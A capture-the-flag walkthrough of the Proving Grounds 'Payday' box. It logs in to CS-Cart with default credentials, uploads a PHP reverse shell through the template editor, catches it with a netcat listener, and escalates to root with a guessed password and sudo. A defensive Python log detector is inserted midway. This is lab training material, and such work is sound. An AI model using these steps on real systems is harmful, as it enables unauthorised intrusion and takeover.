Payday
Walkthrough for Payday | Proving Grounds
Rated Intermediate, but it is pretty easy and straightforward. This box has default / weak credentials. We will exploit an authenticated RCE vulnerability to get the initial foothold, then switch to another user who has weak login credentials, and finally exploit a sudo misconfiguration to get root privileges.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/payday/scans]
└─$ sudo nmap $ip -sVCS -O -oN nmapInitial.txt -Pn
[sudo] password for imtodess:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-05 05:53 EDT
Nmap scan report for 192.168.91.39
Host is up (0.24s latency).
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
| 1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
|_ 2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: CS-Cart. Powerful PHP shopping cart software
110/tcp open pop3 Dovecot pop3d
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open imap Dovecot imap
445/tcp open netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 40m06s, deviation: 1h37m58s, median: 6s
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: payday
| NetBIOS computer name:
| Domain name:
| FQDN: payday
|_ System time: 2021-09-05T05:54:03-04:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/payday/scans]
└─$ dirsearch -u $ip /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php -t 50
_|. _ _ _ _ _ _|_ v0.4.1
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 50 | Wordlist size: 8914
Output File: /home/kali/.dirsearch/reports/192.168.91.39/_21-09-05_06-08-14.txt
Error Log: /home/kali/.dirsearch/logs/errors-21-09-05_06-08-14.log
Target: http://192.168.91.39/
[06:08:16] Starting:
[06:08:23] 403 - 310B - /.ht_wsr.txt
[06:08:23] 403 - 313B - /.htaccess.bak1
[06:08:23] 403 - 313B - /.htaccess.orig
[06:08:23] 403 - 315B - /.htaccess.sample
[06:08:23] 403 - 313B - /.htaccess.save
[06:08:23] 403 - 314B - /.htaccess_extra
[06:08:23] 403 - 313B - /.htaccess_orig
[06:08:23] 403 - 311B - /.htaccessBAK
[06:08:23] 403 - 311B - /.htaccess_sc
[06:08:23] 403 - 311B - /.htaccessOLD
[06:08:23] 403 - 312B - /.htaccessOLD2
[06:08:23] 403 - 303B - /.htm
[06:08:23] 403 - 304B - /.html
[06:08:23] 403 - 310B - /.httr-oauth
[06:08:23] 403 - 309B - /.htpasswds
[06:08:23] 403 - 313B - /.htpasswd_test
[06:08:31] 200 - 1B - /Thumbs.db
[06:08:34] 301 - 333B - /addons -> http://192.168.91.39/addons/
[06:08:35] 200 - 9KB - /admin
[06:08:44] 301 - 334B - /catalog -> http://192.168.91.39/catalog/
[06:08:45] 403 - 307B - /cgi-bin/
[06:08:45] 301 - 334B - /classes -> http://192.168.91.39/classes/
[06:08:45] 200 - 2KB - /classes/
[06:08:46] 200 - 13B - /config
[06:08:46] 200 - 13B - /config.php
[06:08:46] 200 - 13B - /config/
[06:08:47] 301 - 331B - /core -> http://192.168.91.39/core/
[06:08:48] 403 - 303B - /doc/
[06:08:48] 403 - 307B - /doc/api/
[06:08:48] 403 - 318B - /doc/en/changes.html
[06:08:48] 403 - 317B - /doc/stable.version
[06:08:48] 403 - 318B - /doc/html/index.html
[06:08:52] 301 - 333B - /images -> http://192.168.91.39/images/
[06:08:52] 302 - 0B - /images/ -> ../index.php
[06:08:52] 200 - 2KB - /image.php
[06:08:52] 200 - 2KB - /image
[06:08:52] 301 - 334B - /include -> http://192.168.91.39/include/
[06:08:52] 302 - 0B - /include/ -> ../index.php
[06:08:53] 200 - 13B - /init/
[06:08:53] 200 - 8KB - /install
[06:08:53] 200 - 8KB - /install.php
[06:08:53] 200 - 8KB - /install/index.php?upgrade/
[06:08:53] 200 - 8KB - /install/
[06:08:53] 200 - 8KB - /install/update.log
[06:08:53] 200 - 27KB - /index
[06:08:53] 200 - 27KB - /index.php/login/
[06:08:53] 200 - 27KB - /index.php
[06:08:58] 301 - 335B - /payments -> http://192.168.91.39/payments/
[06:09:02] 403 - 312B - /server-status
[06:09:02] 403 - 313B - /server-status/
[06:09:03] 301 - 332B - /skins -> http://192.168.91.39/skins/
[06:09:07] 301 - 330B - /var -> http://192.168.91.39/var/
[06:09:07] 302 - 0B - /var/ -> ../index.php
We can log in with admin:admin. A quick search for cs-cart using searchsploit gives us information about its known vulnerabilities.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/payday/scans]
└─$ searchsploit cs-cart
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
CS-Cart - Multiple SQL Injections | php/webapps/27030.txt
CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting | php/webapps/31443.txt
CS-Cart 1.3.3 - 'classes_dir' LFI | php/webapps/48890.txt
CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion | php/webapps/1872.txt
CS-Cart 1.3.3 - 'install.php' Cross-Site Scripting | multiple/webapps/14962.txt
CS-Cart 1.3.3 - authenticated RCE | php/webapps/48891.txt
CS-Cart 1.3.5 - Authentication Bypass | php/webapps/6352.txt
CS-Cart 2.0.0 Beta 3 - 'Product_ID' SQL Injection | php/webapps/8184.txt
CS-Cart 2.0.5 - 'reward_points.post.php' SQL Injection | php/webapps/33146.txt
CS-Cart 2.2.1 - 'products.php' SQL Injection | php/webapps/36093.txt
CS-Cart 4.2.4 - Cross-Site Request Forgery | php/webapps/36358.html
CS-Cart 4.3.10 - XML External Entity Injection | php/webapps/40770.txt
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/payday/scans]
└─$ cd ../exploit
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/payday/exploit]
└─$ searchsploit -m php/webapps/48891.txt
Exploit: CS-Cart 1.3.3 - authenticated RCE
URL: https://www.exploit-db.com/exploits/48891
Path: /usr/share/exploitdb/exploits/php/webapps/48891.txt
File Type: ASCII text, with CRLF line terminators
Copied to: /home/kali/oscp/boxes/pg/payday/exploit/48891.txt
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/payday/exploit]
└─$ cat 48891.txt
# Exploit Title: CS-Cart authenticated RCE
# Date: 2020-09-22
# Exploit Author: 0xmmnbassel
# Vendor Homepage: https://www.cs-cart.com/e-commerce-platform.html
# Tested at: ver. 1.3.3
# Vulnerability Type: authenticated RCE
get PHP shells from
http://pentestmonkey.net/tools/web-shells/php-reverse-shell
edit IP && PORT
Upload to file manager
change the extension from .php to .phtml
visit http://[victim]/skins/shell.phtml --> Profit. ...!
According to the exploit, CS-Cart is vulnerable to arbitrary file upload. We can upload a PHP file with the .phtml extension and execute it by browsing to /skins/filename.phtml. We will upload a PHP reverse shell.
If you are using Kali Linux, they are already available in:
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/seclists/Web-Shells/laudanum-0.8/php/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php
Change the IP and port accordingly and rename the extension to .phtml. Then visit admin.php?target=template_editor, select your file and upload it. You will see this if it was uploaded successfully.
Start a netcat listener and go to /skins/shell.phtml.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/payday/exploit]
└─$ nc -nvlp 143
listening on [any] 143 ...
connect to [192.168.49.91] from (UNKNOWN) [192.168.91.39] 40441
Linux payday 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
06:14:49 up 26 min, 0 users, load average: 0.04, 0.13, 0.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ whoami
www-data
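As an added example (not part of the original walkthrough or of CS-Cart itself), the Python detector below shows what the upload-then-execute chain above looks like in an Apache access log and flags it. The log lines, client IPs and timestamps are constructed, the 10-minute correlation window is an assumed tuning value, and the script-extension list is the set a default Debian/Ubuntu mod_php handles (assumed here).

```python
import re
from datetime import datetime, timedelta

# Constructed sample lines in Apache combined log format (not taken from the box).
SAMPLE_LOG = """\
192.168.49.91 - - [05/Sep/2021:06:10:02 -0400] "GET /admin.php HTTP/1.1" 200 9215 "-" "Mozilla/5.0"
192.168.49.91 - - [05/Sep/2021:06:12:10 -0400] "POST /admin.php?target=template_editor HTTP/1.1" 200 9123 "-" "Mozilla/5.0"
192.168.49.91 - - [05/Sep/2021:06:14:49 -0400] "GET /skins/shell.phtml HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.7 - - [05/Sep/2021:06:15:00 -0400] "GET /skins/basic/customer/styles.css HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
10.0.0.7 - - [05/Sep/2021:06:16:00 -0400] "GET /skins/basic/images/logo.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Extensions a default Debian/Ubuntu mod_php hands to the PHP interpreter (assumed).
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar)$', re.IGNORECASE)
# Assumed window: an upload followed by execution within 10 minutes from the same client.
WINDOW = timedelta(minutes=10)


def parse(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect(log_text):
    """Return (severity, ip, path) findings for scripts served from the /skins/ tree."""
    findings = []
    last_upload = {}  # ip -> time of that client's most recent template_editor POST
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST" and "target=template_editor" in rec["path"]:
            last_upload[rec["ip"]] = rec["ts"]
            continue
        # /skins/ should only hold templates and static assets, so a successfully
        # served script there is suspicious on its own; tie it to a recent upload
        # from the same client to raise the severity.
        if path.startswith("/skins/") and SCRIPT_EXT.search(path) and rec["status"] == 200:
            uploaded_at = last_upload.get(rec["ip"])
            if uploaded_at is not None and rec["ts"] - uploaded_at <= WINDOW:
                findings.append(("high", rec["ip"], path))
            else:
                findings.append(("medium", rec["ip"], path))
    return findings
```

The same logic ports directly to a SIEM rule, and on a real deployment it pairs naturally with an Apache rule that refuses to hand files under /skins/ to the PHP handler, which removes the execution path entirely.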
From the /etc/passwd file we get the username of another user:
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bash
Use the common credentials patrick:patrick to switch to that user.
www-data@payday:/tmp$ su patrick
Password:
patrick@payday:/tmp$ ls
linpeas.sh vmware-root
patrick@payday:/tmp$ cd
Check the sudo privileges for user patrick.
patrick@payday:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for patrick:
User patrick may run the following commands on this host:
(ALL) ALL
patrick can run any command with sudo, so we just change user to root using sudo su.
patrick@payday:~$ sudo su
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for patrick:
root@payday:/home/patrick# cd
root@payday:~# id
uid=0(root) gid=0(root) groups=0(root)
root@payday:~# whoami
root
root@payday:~# cat proof.txt
b8a<REDACTED>655